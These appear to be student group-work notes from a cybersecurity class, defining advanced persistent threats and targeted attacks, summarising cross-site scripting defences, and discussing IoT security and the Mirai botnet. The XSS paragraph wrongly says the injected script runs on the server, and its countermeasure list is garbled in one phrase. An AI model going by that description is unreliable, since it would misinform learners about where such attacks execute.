https://www.alpinesecurity.com/blog/most-dangerous-hacked-medical-devices

Group work:
Activity 1:
The proposed definitions for each attack were:

Advanced Persistent Threats:

APT is an attack campaign in which an intruder, or team of intruders, establishes an
illicit long-term presence on a network in order to mine highly sensitive data. The
targets of the attack are very carefully chosen, these are normally large enterprises
or governmental networks. Some examples are NetTraveler, Titan Rain, GhostNet
and shadow-hammer.

Targeted Attacks:
A targeted attack refers to a type of threat in which threat actors actively pursue and
compromise a target entity’s infrastructure while maintaining anonymity. These
attackers have a certain level of expertise and have enough resources to conduct
their schemes over a long-term period. They can adapt, adjust, or
improve their attacks to counter their victim’s defences. Ginwui and
the PPDropper Trojans are some examples of targeted attacks.

Activity 2:
Cross-Site Scripting is a cyber-attack that consists of injecting malicious code in the
form of JavaScript scripts that will be run by the server when the cybercriminal inputs
the code in some input field. Some countermeasures are, input sanitation, input
validation, blacklisting of the allow characters, encoding, content security policies
and XSS prevention libraries.

Activity 3:
Some of the challenges of securing IoT devices is that normal wireless security
mechanisms cannot be used for this technology due to the low data rates they use
and the computing capacity is very limited, so the most common security algorithms
cannot be run in the devices. One example of a security breach that happened on
these devices is the Mirai attack, where a lot of IoT devices were infected and
converted into bots that could perform massive DDoS attacks to big companies like
Netflix or Amazon.

Chairperson closed the meeting at 11:46.